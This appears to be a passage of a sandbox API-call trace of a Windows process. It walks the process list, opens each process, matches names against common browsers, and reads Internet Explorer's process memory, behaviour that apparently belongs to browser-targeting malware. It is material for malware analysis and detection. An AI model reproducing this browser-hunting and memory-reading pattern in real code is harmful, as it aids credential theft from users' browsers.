	[0210.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.771] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0210.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.772] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.772] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0210.773] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3884
	[0210.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.773] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0210.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.773] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.773] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0210.773] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.773] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.774] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0210.774] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3888
	[0210.774] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.774] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0210.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.775] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.775] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0210.775] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.775] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.775] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0210.776] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x388c
	[0210.776] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.776] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0210.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.777] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.777] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.777] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0210.778] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.778] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.778] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0210.778] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3890
	[0210.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.779] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0210.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.779] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0210.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.780] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.781] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0210.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3894
	[0210.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.782] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0210.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.782] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0210.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.783] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.783] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0210.784] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x3898
	[0210.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.784] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0210.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.785] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.785] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0210.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.786] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.787] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0210.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x389c
	[0210.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.787] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0210.788] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.788] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.789] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0210.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.789] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.790] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.790] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x38a0
	[0210.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.790] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.791] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.791] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.791] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.791] NtQueryInformationProcess (in: ProcessHandle=0x38a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.792] ReadProcessMemory (in: hProcess=0x38a0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.792] ReadProcessMemory (in: hProcess=0x38a0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.792] ReadProcessMemory (in: hProcess=0x38a0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.792] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.792] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0210.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x38a4
	[0210.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0210.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0210.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.793] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0210.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.794] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.794] NtQueryInformationProcess (in: ProcessHandle=0x38a4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0210.794] ReadProcessMemory (in: hProcess=0x38a4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0210.794] ReadProcessMemory (in: hProcess=0x38a4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0210.794] ReadProcessMemory (in: hProcess=0x38a4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0210.794] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0210.794] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x38a8
	[0210.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.795] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.795] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.796] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.796] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.796] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0210.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x38ac
	[0210.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.797] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0210.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.797] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.798] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0210.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.798] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.798] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x38b0
	[0210.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.799] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.799] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.800] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.800] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.800] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.801] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.802] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x38b4
	[0210.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.802] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.802] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.802] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.803] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.803] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.803] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0210.804] CloseHandle (hObject=0x188) returned 1
	[0210.804] Sleep (dwMilliseconds=0x64) 
	[0210.914] GetCurrentProcessId () returned 0x110
	[0210.914] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0210.919] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0210.921] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0210.923] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0210.925] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x38b8
	[0210.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.925] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.926] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.926] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.927] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.929] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x38bc
	[0210.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.930] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.930] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.930] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.930] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.931] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0210.931] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x38c0
	[0210.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.931] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0210.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.932] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.932] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0210.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.932] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.933] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0210.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x38c4
	[0210.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.933] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0210.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.934] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.934] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0210.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.934] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.935] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0210.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x38c8
	[0210.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.936] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0210.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.936] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.936] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0210.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0210.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x38cc
	[0210.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.938] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0210.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.938] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.938] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0210.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.938] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.939] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0210.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x38d0
	[0210.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.939] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0210.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.940] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.940] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0210.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.940] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0210.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x38d4
	[0210.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.941] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.941] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.942] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.942] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
